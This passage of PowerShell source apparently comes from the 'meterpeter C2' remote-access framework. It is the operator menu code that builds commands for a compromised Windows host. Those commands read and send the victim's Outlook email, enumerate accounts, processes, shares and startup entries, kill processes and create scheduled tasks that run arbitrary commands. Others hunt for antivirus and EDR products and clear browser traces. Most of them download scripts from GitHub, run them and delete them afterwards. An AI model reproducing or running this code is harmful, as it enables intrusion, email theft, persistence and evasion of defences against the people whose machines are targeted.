its disable`\" `> `$Env:TMP\\fsddsvd.log;Get-Content -Path `\"`$Env:TMP\\fsddsvd.log`\";Remove-Item -Path `\"`$Env:TMP\\fsddsvd.log`\" -Force}\"\r\n }\r\n If($OutLook_choise -ieq \"Emails\")\r\n {\r\n Write-Host \" - Max outlook items to display: \" -NoNewline;\r\n $MaxOfObjectsToDisplay = Read-Host;\r\n If(-not($MaxOfObjectsToDisplay) -or $MaxOfObjectsToDisplay -ieq $null)\r\n {\r\n $MaxOfObjectsToDisplay = \"5\" #Default cmdlet parameter\r\n }\r\n\r\n Write-Host \" - Display message <BODY> (y|n): \" -NoNewline;\r\n $UseVerbose = Read-Host;\r\n If($UseVerbose -iMatch '^(y|yes)$')\r\n {\r\n $UseVerbose = \"True\"\r\n }\r\n Else\r\n {\r\n $UseVerbose = \"False\" \r\n }\r\n\r\n Write-Host \" - Create report logfile? (y|n): \" -NoNewline;\r\n $CreateLogFileSetting = Read-Host;\r\n If($CreateLogFileSetting -iMatch '^(y|yes)$')\r\n {\r\n $CreateLogFileSetting = \"True\"\r\n }\r\n Else\r\n {\r\n $CreateLogFileSetting = \"False\" \r\n }\r\n\r\n #Execute command remotely\r\n Write-Host \" * Scanning OutLook for Email Objects\" -ForegroundColor Green\r\n $Command = \"If((Get-MpComputerStatus).RealTimeProtectionEnabled -ieq `\"True`\"){iwr -Uri `\"https://raw.githubusercontent.com/r00t-3xp10it/redpill/main/bin/ReadEmails.ps1`\" -OutFile `\"`$Env:TMP\\ReadEmails.ps1`\"|Out-Null;powershell -File `$Env:TMP\\ReadEmails.ps1 -action 'enum' -MaxItems `\"$MaxOfObjectsToDisplay`\" -logfile `\"$CreateLogFileSetting`\" -verb `\"$UseVerbose`\" -Egg `\"True`\";Remove-Item -Path `$Env:TMP\\ReadEmails.ps1 -Force}Else{echo '';echo `\" `> Error: Outlook does not let us manipulate it if 'RealTimeProtection' its disable`\" `> `$Env:TMP\\fsddsvd.log;Get-Content -Path `\"`$Env:TMP\\fsddsvd.log`\";Remove-Item -Path `\"`$Env:TMP\\fsddsvd.log`\" -Force}\"\r\n }\r\n If($OutLook_choise -ieq \"SendMail\")\r\n {\r\n #<SendTo>, <SendSubject>, <SendBody>\r\n Write-Host \" - Send To Email: \" -ForegroundColor Red -NoNewline;\r\n $SendTo = Read-Host;\r\n If(-not($SendTo) -or $SendTo -ieq $null)\r\n {\r\n write-host \"`n\"\r\n write-host \" [Error] Module requires 'SendTo' address!\" -ForegroundColor Red -BackgroundColor Black\r\n write-host \" [ inf ] SendTo: 'pedroUbuntui@gmail.com'\" -ForegroundColor DarkGray\r\n $OutLook_choise = $null\r\n $Command = $null\r\n }\r\n Else\r\n {\r\n Write-Host \" - Email Subject: \" -NoNewline;\r\n $SendSubject = Read-Host;\r\n If(-not($SendSubject) -or $SendSubject -ieq $null)\r\n {\r\n $SendSubject = \"@Meterpeter C2 v2.10.11 Email\"\r\n }\r\n\r\n Write-Host \" - Email Body : \" -NoNewline;\r\n $SendBody = Read-Host;\r\n If(-not($SendBody) -or $SendBody -ieq $null)\r\n {\r\n $SendBody = \"Testing @Meterpeter C2 SendEmail funtion ...\"\r\n }\r\n\r\n #Execute command remotely\r\n Write-Host \" * Send Email using '\" -ForegroundColor Green -NoNewline\r\n Write-Host \"$Remote_Host\" -ForegroundColor DarkYellow -NoNewline\r\n Write-Host \"' OutLook!\" -ForegroundColor Green\r\n $Command = \"If((Get-MpComputerStatus).RealTimeProtectionEnabled -ieq `\"True`\"){iwr -Uri `\"https://raw.githubusercontent.com/r00t-3xp10it/redpill/main/bin/ReadEmails.ps1`\" -OutFile `\"`$Env:TMP\\ReadEmails.ps1`\"|Unblock-File;powershell -File `$Env:TMP\\ReadEmails.ps1 -action 'send' -SendTo '$SendTo' -SendSubject '$SendSubject' -SendBody '$SendBody' -Egg `\"True`\";Remove-Item -Path `$Env:TMP\\ReadEmails.ps1 -Force}Else{echo '';echo `\" `> Error: Outlook does not let us manipulate it if 'RealTimeProtection' its disable`\" `> `$Env:TMP\\fsddsvd.log;Get-Content -Path `\"`$Env:TMP\\fsddsvd.log`\";Remove-Item -Path `\"`$Env:TMP\\fsddsvd.log`\" -Force}\"\r\n }\r\n }\r\n If($OutLook_choise -ieq \"Return\" -or $OutLook_choise -ieq \"cls\" -or $OutLook_choise -ieq \"Modules\")\r\n {\r\n $OutLook_choise = $null\r\n $Command = $Null;\r\n }\r\n }\r\n If($choise -ieq \"Accounts\" -or $choise -ieq \"acc\")\r\n {\r\n write-host \" * Listing remote accounts.\" -ForegroundColor Green;Start-Sleep -Seconds 1;write-host \"\";\r\n $Command = \"Get-WmiObject Win32_UserAccount -filter 'LocalAccount=True'| Select-Object Name,SID,PasswordRequired,PasswordChangeable|Format-Table -AutoSize|Out-File users.txt;Start-Sleep -Seconds 1;`$Out = Get-Content users.txt|Select -Skip 1|Select -SkipLast 2;If(-not(`$Out)){echo `\" `> Error: cmdlet cant retrive remote host accounts ..`\"}Else{echo `$Out};Remove-Item -Path users.txt -Force\"\r\n }\r\n If($choise -ieq \"RevShell\" -or $choise -ieq \"Shell\")\r\n {\r\n write-host \" * Enumerating shell privileges.\" -ForegroundColor Green;Start-Sleep -Seconds 1;write-host \"\";\r\n $Command = \"echo `\" Client ppid : `$pid `\" `> Priv.txt;`$bool = (([System.Security.Principal.WindowsIdentity]::GetCurrent()).groups -match `\"S-1-5-32-544`\");If(`$bool){echo `\" Client priv : *ADMINISTRATOR*`\" `>`> Priv.txt}Else{echo `\" Client priv : USERLAND`\" `>`> Priv.txt};`$Manufacturer = (Get-WmiObject Win32_OperatingSystem).Caption;echo `\" Client OS : `$Manufacturer`\" `>`> Priv.txt;`$ClientShell = (Get-location).Path;echo `\" Client path : `$ClientShell`\" `>`> Priv.txt;Get-Content Priv.txt;Remove-Item Priv.txt -Force\"\r\n }\r\n If($choise -ieq \"ListAppl\" -or $choise -ieq \"appl\")\r\n {\r\n write-host \" * List applications installed.\" -ForegroundColor Green;Start-Sleep -Seconds 1\r\n $Command = \"Get-ItemProperty HKLM:\\Software\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\* | Select-Object DisplayName,DisplayVersion | Format-Table -AutoSize\";\r\n }\r\n If($choise -ieq \"Processes\" -or $choise -ieq \"proc\")\r\n {\r\n write-host \"`n`n Description:\" -ForegroundColor Yellow;\r\n write-host \" Manage remote processes\";\r\n write-host \"`n`n Modules Description Privileges Required\" -ForegroundColor green;\r\n write-host \" ------- ----------- ------------------\";\r\n write-host \" Check List Remote Processe(s) Running UserLand\";\r\n write-host \" Query Process name verbose information UserLand\";\r\n write-host \" DllSearch List DLLs loaded by processes UserLand\";\r\n write-host \" Kill Kill Remote Process From Running \" -NoNewline\r\n write-host \"Administrator\" -ForegroundColor Red;\r\n write-host \" Return Return to Server Main Menu\" -ForeGroundColor yellow;\r\n write-host \"`n`n :meterpeter:Adv:Proc> \" -NoNewline -ForeGroundColor Green;\r\n $wifi_choise = Read-Host;\r\n If($wifi_choise -ieq \"Query\")\r\n {\r\n Write-Host \" - Query process name: \" -NoNewline -ForeGroundColor Red;\r\n $Proc_name = Read-Host;\r\n If(-not ($proc_name) -or $Proc_name -ieq \" \")\r\n {\r\n write-host \"`n`n Error: We need to provide a process name ..`n\" -ForegroundColor Red\r\n $Command = $Null;\r\n $Proc_name = $Null;\r\n }\r\n Else\r\n {\r\n $Command = \"`$ProcessId = (Get-Process -Name `\"$Proc_name`\").Id;iwr -uri `\"https://raw.githubusercontent.com/r00t-3xp10it/redpill/main/bin/GetProcess.ps1`\" -OutFile `\"`$Env:TMP\\GetProcess.ps1`\"|Unblock-File;iwr -uri `\"https://raw.githubusercontent.com/r00t-3xp10it/redpill/main/bin/Get-TokenPrivs.ps1`\" -OutFile `\"`$Env:TMP\\Get-TokenPrivs.ps1`\"|Unblock-File;powershell -File `\"`$Env:TMP\\GetProcess.ps1`\" -GetProcess Enum -ProcessName `\"$Proc_name`\" -verb true -exclude 'false';powershell -File `\"`$Env:TMP\\Get-TokenPrivs.ps1`\" -ProcID `$ProcessId;Remove-Item -Path `$Env:TMP\\Get-TokenPrivs.ps1 -Force;Remove-Item -Path `$Env:TMP\\GetProcess.ps1 -Force\";\r\n }\r\n }\r\n If($wifi_choise -ieq \"DllSearch\")\r\n {\r\n write-host \" * List DLL's loaded by processes.`n\" -ForegroundColor Green\r\n $Command = \"iwr -uri `\"https://raw.githubusercontent.com/r00t-3xp10it/redpill/main/bin/DLLSearch.ps1`\" -OutFile `\"`$Env:TMP\\DLLSearch.ps1`\"|Unblock-File;powershell -File `\"`$Env:TMP\\DLLSearch.ps1`\" -filter 'all';Remove-Item -Path `$Env:TMP\\DLLSearch.ps1 -Force\"; \r\n }\r\n If($wifi_choise -ieq \"Check\")\r\n {\r\n write-host \" * List remote processe(s) running.\" -ForegroundColor Green\r\n write-host \" => Exclude: wlanext|svchost|RuntimeBroker`n\" -ForegroundColor Yellow\r\n \r\n Start-Sleep -Seconds 1\r\n $Command = \"Get-Process|Select-Object Id,ProcessName,Description,ProductVersion|Where-Object{`$_.ProcessName -iNotMatch '(wlanext`|svchost`|RuntimeBroker)'}|Format-Table -AutoSize|Out-File dellog.txt;`$check_tasks = Get-content dellog.txt;If(-not(`$check_tasks)){echo `\" cmdlet failed to retrieve processes List ..`\" `> dellog.txt;Get-Content dellog.txt;Remove-Item dellog.txt -Force}Else{Get-Content dellog.txt;Remove-Item dellog.txt -Force}\";\r\n }\r\n If($wifi_choise -ieq \"kill\")\r\n {\r\n\r\n Write-Host \" - kill [N]ProcessName or [P]PID: \" -NoNewline -ForegroundColor Red\r\n $KillChoise = Read-Host\r\n If(-not($KillChoise) -or $KillChoise -iMatch '(n|ProcessName)')\r\n {\r\n Write-Host \" - The process name to kill : \" -ForegroundColor Red -NoNewline\r\n $Proc_name = Read-Host\r\n If(-not ($proc_name) -or $Proc_name -ieq \" \")\r\n {\r\n write-host \"`n `> Error: We need to provide a process name ..`n\" -ForegroundColor Red\r\n $Command = $Null;\r\n $Proc_name = $Null;\r\n }\r\n Else\r\n {\r\n write-host \" * Killing $Proc_name remote process.\" -ForegroundColor Green;\r\n If($Proc_name -iMatch '(.exe)$'){$Proc_name = $Proc_name -replace '.exe',''};Start-Sleep -Seconds 1;write-host \"\";\r\n $Command = \"iwr -Uri `\"https://raw.githubusercontent.com/r00t-3xp10it/redpill/main/bin/killProcess.ps1`\" -OutFile `\"`$Env:TMP\\killProcess.ps1`\"|Unblock-File;powershell -file `\"`$Env:TMP\\killProcess.ps1`\" -Proc_name $Proc_name -ppid false -dontkill `\"`$PID`\";Remove-Item -Path `\"`$Env:TMP\\killProcess.ps1`\" -Force\"\r\n }\r\n }\r\n Else\r\n {\r\n Write-Host \" - PID of the process to kill : \" -ForegroundColor Red -NoNewline\r\n $Proc_name = Read-Host\r\n If(-not ($proc_name) -or $Proc_name -ieq \" \")\r\n {\r\n write-host \"`n Error: We need to provide a process PID ..`n\" -ForegroundColor Red\r\n $Command = $Null;\r\n $Proc_name = $Null;\r\n }\r\n Else\r\n {\r\n write-host \" * Killing $Proc_name remote process PID.\" -ForegroundColor Green;Start-Sleep -Seconds 1;write-host \"\";\r\n $Command = \"iwr -Uri `\"https://raw.githubusercontent.com/r00t-3xp10it/redpill/main/bin/killProcess.ps1`\" -OutFile `\"`$Env:TMP\\killProcess.ps1`\"|Unblock-File;powershell -file `\"`$Env:TMP\\killProcess.ps1`\" -Proc_name false -ppid $Proc_name;Remove-Item -Path `\"`$Env:TMP\\killProcess.ps1`\" -Force\" \r\n }\r\n }\r\n }\r\n If($wifi_choise -ieq \"Return\" -or $wifi_choise -ieq \"return\" -or $wifi_choise -ieq \"cls\" -or $wifi_choise -ieq \"Modules\" -or $wifi_choise -ieq \"modules\")\r\n {\r\n $wifi_choise = $null\r\n $Command = $Null;\r\n }\r\n }\r\n If($choise -ieq \"tasks\")\r\n {\r\n write-host \"`n`n Warnning:\" -ForegroundColor Yellow;\r\n write-host \" In some targets schtasks service is configurated\";\r\n write-host \" To not run any task IF connected to the battery\";\r\n write-host \"`n`n Modules Description Privileges Required\" -ForegroundColor green;\r\n write-host \" ------- ----------- ------------------\";\r\n write-host \" Check Retrieve Schedule Tasks UserLand\";\r\n write-host \" Query Advanced Info Single Task UserLand\";\r\n write-host \" RunOnce Create a new remote task UserLand\";\r\n write-host \" LoopExec Create a new remote task UserLand\";\r\n write-host \" Delete Delete Remote-Host Single Task UserLand\";\r\n write-host \" Return Return to Server Main Menu\" -ForeGroundColor yellow;\r\n write-host \"`n`n :meterpeter:Adv:Tasks> \" -NoNewline -ForeGroundColor Green;\r\n $my_choise = Read-Host;\r\n If($my_choise -ieq \"Check\")\r\n {\r\n write-host \"\"\r\n $Command = \"iwr -uri `\"https://raw.githubusercontent.com/r00t-3xp10it/redpill/main/bin/SchTasks.ps1`\" -OutFile `\"`$Env:TMP\\SchTasks.ps1`\"|Unblock-File;Powershell -file `\"`$Env:TMP\\SchTasks.ps1`\" -action `\"check`\";Remove-Item -Path `\"`$Env:TMP\\SchTasks.ps1`\" -Force\"\r\n }\r\n If($my_choise -ieq \"Query\")\r\n {\r\n write-Host \" - Input TaskName: \" -NoNewline -ForegroundColor Red\r\n $TaskName = Read-Host\r\n\r\n If(-not($TaskName))\r\n {\r\n $TaskName = \"MeterpeterC2\"\r\n write-host \" => Wrong setting, set taskname to: $TaskName\" -ForegroundColor Red\r\n }\r\n\r\n write-host \"`n\"\r\n $Command = \"iwr -uri `\"https://raw.githubusercontent.com/r00t-3xp10it/redpill/main/bin/SchTasks.ps1`\" -OutFile `\"`$Env:TMP\\SchTasks.ps1`\"|Unblock-File;Powershell -file `\"`$Env:TMP\\SchTasks.ps1`\" -action `\"query`\" -taskname `\"$TaskName`\";Remove-Item -Path `\"`$Env:TMP\\SchTasks.ps1`\" -Force\"\r\n }\r\n If($my_choise -ieq \"RunOnce\")\r\n {\r\n write-Host \" - Input TaskName to create: \" -NoNewline -ForegroundColor Red\r\n $TaskName = Read-Host\r\n If(-not($TaskName))\r\n {\r\n $TaskName = \"MeterpeterC2\"\r\n write-host \" => Wrong setting, set TaskName to: $TaskName\" -ForegroundColor Red \r\n }\r\n\r\n write-Host \" - Input StartTime (13:45) : \" -NoNewline\r\n $StartTime = Read-Host\r\n If(-not($StartTime))\r\n {\r\n $StartTime = \"13:45\"\r\n write-host \" => Wrong setting, set starttime to: $StartTime\" -ForegroundColor Red\r\n }\r\n\r\n write-Host \" - Input Command|BinaryPath: \" -NoNewline\r\n $Execute = Read-Host\r\n If(-not($Execute))\r\n {\r\n $Execute = \"cmd /R start calc.exe\"\r\n write-host \" => Wrong setting, set Execute to: $Execute\" -ForegroundColor Red \r\n }\r\n\r\n write-host \"\"\r\n $Command = \"iwr -uri `\"https://raw.githubusercontent.com/r00t-3xp10it/redpill/main/bin/SchTasks.ps1`\" -OutFile `\"`$Env:TMP\\SchTasks.ps1`\"|Unblock-File;Powershell -file `\"`$Env:TMP\\SchTasks.ps1`\" -action `\"RunOnce`\" -TaskName `\"$TaskName`\" -StartTime `\"$StartTime`\" -Execute `\"$Execute`\";Remove-Item -Path `\"`$Env:TMP\\SchTasks.ps1`\" -Force\"\r\n }\r\n If($my_choise -ieq \"LoopExec\")\r\n {\r\n write-Host \" - Input Task Name to create : \" -NoNewline -ForegroundColor Red\r\n $TaskName = Read-Host;\r\n If(-not($TaskName))\r\n {\r\n $TaskName = \"MeterpeterC2\"\r\n write-host \" => Wrong setting, set TaskName to: $TaskName\" -ForegroundColor Red \r\n }\r\n\r\n write-Host \" - Execute task after (minuts) : \" -NoNewline\r\n $Interval = Read-Host\r\n If(-not($Interval))\r\n {\r\n $Interval = \"10\"\r\n write-host \" => Wrong setting, set Interval to: $Interval\" -ForegroundColor Red \r\n }\r\n\r\n write-Host \" - Task Duration (1 TO 9 Hours): \" -NoNewline\r\n $Duration = Read-Host\r\n If(-not($Duration))\r\n {\r\n $Duration = \"1\"\r\n write-host \" => Wrong setting, set Duration to: $Duration\" -ForegroundColor Red \r\n \r\n }\r\n\r\n write-Host \" - Input Command|Binary Path : \" -NoNewline -ForegroundColor Red\r\n $Execute = Read-Host\r\n If(-not($Execute))\r\n {\r\n $Execute = \"cmd /R start calc.exe\"\r\n write-host \" => Wrong setting, set Execute to: $Execute\" -ForegroundColor Red \r\n }\r\n\r\n write-host \"`n\"\r\n $Command = \"iwr -uri `\"https://raw.githubusercontent.com/r00t-3xp10it/redpill/main/bin/SchTasks.ps1`\" -OutFile `\"`$Env:TMP\\SchTasks.ps1`\"|Unblock-File;Powershell -file `\"`$Env:TMP\\SchTasks.ps1`\" -action `\"LoopExec`\" -TaskName `\"$TaskName`\" -Interval `\"$Interval`\" -Duration `\"$Duration`\" -Execute `\"$Execute`\";Remove-Item -Path `\"`$Env:TMP\\SchTasks.ps1`\" -Force\"\r\n }\r\n If($my_choise -ieq \"Delete\")\r\n {\r\n write-Host \" - Input TaskName: \" -NoNewline -ForeGroundColor Red\r\n $TaskName = Read-Host\r\n\r\n If(-not($TaskName))\r\n {\r\n $TaskName = \"MeterpeterC2\"\r\n write-host \" => Wrong setting, set TaskName to: $TaskName\" -ForegroundColor Red \r\n }\r\n\r\n write-host \"`n\"\r\n $Command = \"iwr -uri `\"https://raw.githubusercontent.com/r00t-3xp10it/redpill/main/bin/SchTasks.ps1`\" -OutFile `\"`$Env:TMP\\SchTasks.ps1`\"|Unblock-File;Powershell -file `\"`$Env:TMP\\SchTasks.ps1`\" -action `\"Delete`\" -TaskName `\"$TaskName`\";Remove-Item -Path `\"`$Env:TMP\\SchTasks.ps1`\" -Force\"\r\n }\r\n If($my_choise -ieq \"Return\" -or $my_choise -ieq \"cls\" -or $my_choise -ieq \"Modules\" -or $my_choise -ieq \"clear\")\r\n {\r\n $Command = $Null;\r\n $my_choise = $Null;\r\n }\r\n }\r\n If($choise -ieq \"Drives\" -or $choise -ieq \"driv\")\r\n {\r\n write-host \" * List mounted drives.`n\" -ForegroundColor Green;Start-Sleep -Seconds 1\r\n $Command = \"`$PSVERSION = (`$Host).version.Major;If(`$PSVERSION -gt 5){Get-PSDrive -PSProvider 'FileSystem'|Select-Object Root,CurrentLocation,Used,Free|ft|Out-File dellog.txt}Else{Get-Volume|Out-File dellog.txt};Get-Content dellog.txt;Remove-Item dellog.txt -Force\";\r\n }\r\n If($choise -ieq \"Browser\")\r\n {\r\n write-host \"`n`n Description:\" -ForegroundColor Yellow;\r\n write-host \" Enumerates remote host default browsers\\versions\";\r\n write-host \" Supported: Ie,Edge,Firefox,Chrome,Opera,Safari,Brave\" -ForeGroundColor yellow;\r\n write-host \"`n`n Modules Description Privileges Required\" -ForegroundColor green;\r\n write-host \" ------- ----------- ------------------\";\r\n write-host \" Start Enumerating remote browsers UserLand\";\r\n write-host \" addons Enumerating browsers addons UserLand\";\r\n write-host \" Verbose Enumerating browsers (slow) UserLand\";\r\n write-host \" Clean Major browsers temporary files UserLand\";\r\n write-host \" Return Return to Server Main Menu\" -ForeGroundColor yellow;\r\n write-host \"`n`n :meterpeter:Adv:Browser> \" -NoNewline -ForeGroundColor Green;\r\n $Enumerate_choise = Read-Host;\r\n If($Enumerate_choise -ieq \"Start\")\r\n {\r\n write-host \" * List \" -ForegroundColor Green -NoNewline\r\n write-host \"$Remote_Host\" -ForegroundColor DarkYellow -NoNewline\r\n write-host \" browsers!\" -ForegroundColor Green\r\n $Command = \"iwr -Uri `\"https://raw.githubusercontent.com/r00t-3xp10it/meterpeter/master/mimiRatz/GetBrowsers.ps1`\" -OutFile `\"`$Env:TMP\\GetBrowsers.ps1`\"|Out-Null;powershell -WindowStyle hidden -File `$Env:TMP\\GetBrowsers.ps1 -RECON;Remove-Item -Path `$Env:TMP\\BrowserEnum.log -Force;Remove-Item -Path `$Env:TMP\\GetBrowsers.ps1 -Force\"\r\n }\r\n If($Enumerate_choise -ieq \"addons\")\r\n {\r\n write-host \" * List installed browsers addons.\" -ForegroundColor Green\r\n $Command = \"iwr -Uri `\"https://raw.githubusercontent.com/r00t-3xp10it/meterpeter/master/mimiRatz/GetBrowsers.ps1`\" -OutFile `\"`$Env:TMP\\GetBrowsers.ps1`\"|Out-Null;powershell -WindowStyle hidden -File `$Env:TMP\\GetBrowsers.ps1 -ADDONS;Remove-Item -Path `$Env:TMP\\BrowserEnum.log -Force;Remove-Item -Path `$Env:TMP\\GetBrowsers.ps1 -Force\"\r\n }\r\n If($Enumerate_choise -ieq \"Verbose\")\r\n {\r\n write-host \" * Installed browsers verbose query.\" -ForegroundColor Green\r\n write-host \" => This function takes aprox 1 minute to finish.\" -ForegroundColor DarkYellow\r\n $Command = \"iwr -Uri `\"https://raw.githubusercontent.com/r00t-3xp10it/meterpeter/master/mimiRatz/GetBrowsers.ps1`\" -OutFile `\"`$Env:TMP\\GetBrowsers.ps1`\"|Out-Null;powershell -WindowStyle hidden -File `$Env:TMP\\GetBrowsers.ps1 -ALL;Remove-Item -Path `$Env:TMP\\BrowserEnum.log -Force;Remove-Item -Path `$Env:TMP\\GetBrowsers.ps1 -Force\"\r\n }\r\n If($Enumerate_choise -ieq \"Clean\")\r\n {\r\n write-host \" - Use ClearMyTracksByProcess? (y|n): \" -ForeGroundColor Red -NoNewline;\r\n $ClearMyTracksByProcess = Read-Host;\r\n\r\n write-host \" * Clean major browsers temporary files ..\" -ForegroundColor Green\r\n If($ClearMyTracksByProcess -iMatch '^(y|yes)$')\r\n {\r\n write-host \" => Extra: invoking InetCpl to clean files.\" -ForeGroundColor DarkYellow;\r\n $Command = \"iwr -Uri `\"https://raw.githubusercontent.com/r00t-3xp10it/meterpeter/master/mimiRatz/GetBrowsers.ps1`\" -OutFile `\"`$Env:TMP\\GetBrowsers.ps1`\"|Out-Null;((Get-Content -Path `\"`$Env:TMP\\GetBrowsers.ps1`\" -Raw) -Replace `\"RUIUIUi0 = 'no'`\",`\"RUIUIUi0 = 'yes'`\")|Set-Content -Path `\"`$Env:TMP\\GetBrowsers.ps1`\";powershell -WindowStyle hidden -File `$Env:TMP\\GetBrowsers.ps1 -CLEAN;Remove-Item -Path `$Env:TMP\\BrowserEnum.log -Force;Remove-Item -Path `$Env:TMP\\GetBrowsers.ps1 -Force\" \r\n }\r\n Else\r\n {\r\n $Command = \"iwr -Uri `\"https://raw.githubusercontent.com/r00t-3xp10it/meterpeter/master/mimiRatz/GetBrowsers.ps1`\" -OutFile `\"`$Env:TMP\\GetBrowsers.ps1`\"|Out-Null;powershell -WindowStyle hidden -File `$Env:TMP\\GetBrowsers.ps1 -CLEAN;Remove-Item -Path `$Env:TMP\\BrowserEnum.log -Force;Remove-Item -Path `$Env:TMP\\GetBrowsers.ps1 -Force\"\r\n }\r\n }\r\n If($Enumerate_choise -ieq \"Return\" -or $Enumerate_choise -ieq \"cls\" -or $Enumerate_choise -ieq \"Modules\" -or $Enumerate_choise -ieq \"clear\")\r\n {\r\n $choise = $Null;\r\n $Command = $Null;\r\n $Enumerate_choise = $Null;\r\n }\r\n }\r\n If($choise -ieq \"Recent\" -or $choise -ieq \"rece\")\r\n {\r\n #$path = \"$env:userprofile\\AppData\\Roaming\\Microsoft\\Windows\\Recent\"\r\n write-host \" * Listing recent directory!\" -ForegroundColor Green;Start-Sleep -Seconds 1\r\n $Command = \"Get-ChildItem `$Env:USERPROFILE\\AppData\\Roaming\\Microsoft\\Windows\\Recent|Select-Object Length,Name,CreationTime,LastWriteTime,Attributes|Format-Table -AutoSize|Select -SkipLast 1|Out-File startup.txt;Get-content startup.txt;Remove-Item startup.txt -Force\"\r\n }\r\n If($choise -ieq \"ListSMB\" -or $choise -ieq \"smb\")\r\n {\r\n write-host \" * Remote SMB shares.\" -ForegroundColor Green;Start-Sleep -Seconds 1;write-host \"\";\r\n $Command = \"Get-SmbShare|Select-Object Name,Path,Description|ft|Out-File smb.txt;Start-Sleep -Seconds 1;`$i = Get-Content smb.txt;If(-not(`$i)){echo `\" `> Error: none SMB accounts found under `$Env:COMPUTERNAME`\" `> smb.txt};Get-Content smb.txt;remove-item smb.txt -Force\";\r\n }\r\n If($choise -ieq \"StartUp\" -or $choise -ieq \"start\")\r\n {\r\n write-host \" * Remote host StartUp contents.\" -ForegroundColor Green;Start-Sleep -Seconds 1;write-host \"\";\r\n $Command = \"Get-ChildItem `\"`$Env:APPDATA\\Microsoft\\Windows\\Start Menu\\Programs\\Startup`\"|Select-Object Length,Name,LastWriteTime|Format-Table -AutoSize|Out-File startup.txt;`$checkme = Get-Content -Path startup.txt;If(-not(`$checkme ) -or `$checkme -ieq `$null){echo `\" `> Error: none contents found on startup directory!`\" `> startup.txt};Get-Content -Path startup.txt;Remove-Item startup.txt -Force\";\r\n }\r\n If($choise -ieq \"ListRun\" -or $choise -ieq \"run\")\r\n {\r\n write-host \" * Enumerating startup entrys (regedit)\" -ForegroundColor Green;Start-Sleep -Seconds 1;write-host \"\"\r\n $Command = \"REG QUERY `\"HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run`\"|Where-Object { `$_ -ne '' }|Out-File runen.meterpeter -Force;echo `\"`\" `>`> runen.meterpeter;REG QUERY `\"HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce`\"| Where-Object { `$_ -ne '' } `>`> runen.meterpeter;echo `\"`\" `>`> runen.meterpeter;REG QUERY `\"HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Run`\"| Where-Object { `$_ -ne '' } `>`> runen.meterpeter;Get-content -Path runen.meterpeter;Remove-Item -Path runen.meterpeter -Force\";\r\n } \r\n If($choise -ieq \"AntiVirus\" -or $choise -ieq \"avp\")\r\n {\r\n write-host \"`n`n Description:\" -ForegroundColor Yellow;\r\n write-host \" Enumerates the most common security processes running, \";\r\n write-host \" AppWhitelisting, Behavioral Analysis, Intrusion Detection\";\r\n write-host \" DEP, DLP, Firewall, HIPS and Hunt for EDR's by driver name.\";\r\n write-host \"`n`n Modules Description Privileges Required\" -ForegroundColor green;\r\n write-host \" ------- ----------- -------------------\";\r\n write-host \" Primary PrimaryAV + Security processes UserLand\";\r\n write-host \" FastScan Security processes + EDR hunt UserLand\";\r\n write-host \" Verbose Full scan module (accurate) UserLand\";\r\n write-host \" Return Return to Server Main Menu\" -ForeGroundColor yellow;\r\n write-host \"`n`n :meterpeter:Adv:Avp> \" -NoNewline -ForeGroundColor Green;\r\n $my_choise = Read-Host;\r\n If($my_choise -ieq \"Primary\")\r\n {\r\n write-host \" * Listing Primary AV Product\" -ForegroundColor Green;Start-Sleep -Seconds 1\r\n $Command = \"iwr -uri `\"https://raw.githubusercontent.com/r00t-3xp10it/redpill/main/bin/GetCounterMeasures.ps1`\" -outfile `\"`$Env:TMP\\GetCounterMeasures.ps1`\"|Unblock-File;powershell -File `$Env:TMP\\GetCounterMeasures.ps1 -Action Enum;Remove-Item -Path `$Env:TMP\\GetCounterMeasures.ps1 -Force\";\r\n }\r\n If($my_choise -ieq \"FastScan\")\r\n {\r\n write-host \" * Listing Remote Host Counter Measures (Fast)\" -ForegroundColor Green;\r\n write-host \" => Search for string(s) inside driver file description.\" -ForegroundColor DarkYellow;\r\n write-host \" => Slipt diferent strings to search with PIPE (|) command.\" -ForegroundColor DarkYellow;\r\n Start-Sleep -Seconds 1\r\n \r\n Write-Host \" - Search for string (antimal`ware|sandboxing): \" -NoNewline;\r\n $StringToSearch = Read-Host;\r\n If(-not($StringToSearch) -or $StringToSearch -eq $null)\r\n {\r\n write-host \" => Error: wrong input, use default strings.\" -ForegroundColor Red\r\n $StringToSearch = \"Defender|antimal`ware|sandboxing|Symantec|AVG|Avast|BitDefender|Comodo|Cisco|ESET|FireEye|F-Secure|Kaspersky|Malwa`rebytes|McAfee|Panda|Sophos|SentinelOne\"\r\n }\r\n\r\n #Execute command remote\r\n $Command = \"iwr -uri `\"https://raw.githubusercontent.com/r00t-3xp10it/redpill/main/bin/GetCounterMeasures.ps1`\" -outfile `\"`$Env:TMP\\GetCounterMeasures.ps1`\"|Unblock-File;powershell -File `$Env:TMP\\GetCounterMeasures.ps1 -Action 'enum' -stringsearch 'true' -string `\"$StringToSearch`\";Remove-Item -Path `$Env:TMP\\GetCounterMeasures.ps1 -Force\";\r\n }\r\n If($my_choise -ieq \"Verbose\")\r\n {\r\n write-host \" * Listing Remote Host Counter Measures (Accurate)\" -ForegroundColor Green;\r\n write-host \" => This function takes aprox 1 minute to finish.\" -ForegroundColor DarkYellow;Start-Sleep -Seconds 1\r\n $StringToSearch = \"Defender|antima`lware|sandboxing|Symantec|AVG|Avast|BitDefender|Comodo|Cisco|ESET|FireEye|F-Secure|Kaspersky|Mal`warebytes|McAfee|Panda|Sophos|SentinelOne\"\r\n $Command = \"iwr -uri `\"https://raw.githubusercontent.com/r00t-3xp10it/redpill/main/bin/GetCounterMeasures.ps1`\" -outfile `\"`$Env:TMP\\GetCounterMeasures.ps1`\"|Unblock-File;powershell -File `$Env:TMP\\GetCounterMeasures.ps1 -Action Verbose -stringsearch 'true' -string `\"$StringToSearch`\";Remove-Item -Path `$Env:TMP\\GetCounterMeasures.ps1 -Force\";\r\n }\r\n If($my_choise -ieq \"Return\" -or $my_choise -ieq \"cls\" -or $my_choise -ieq \"Modules\" -or $my_choise -ieq \"clear\")\r\n {\r\n $Command = $Null;\r\n $my_choise = $Null;\r\n }\r\n } \r\n If($choise -ieq \"FRM\" -or $choise -ieq \"FRManager\")\r\n {\r\n write-host \"`n`n Remark:\" -ForegroundColor Yellow;\r\n write-host \" This module allow users to block connections to sellected\";\r\n write-host \" local_port or from remote_port (default value set: 'Any')\";\r\n write-host \" Warning: Total of 3 max multiple 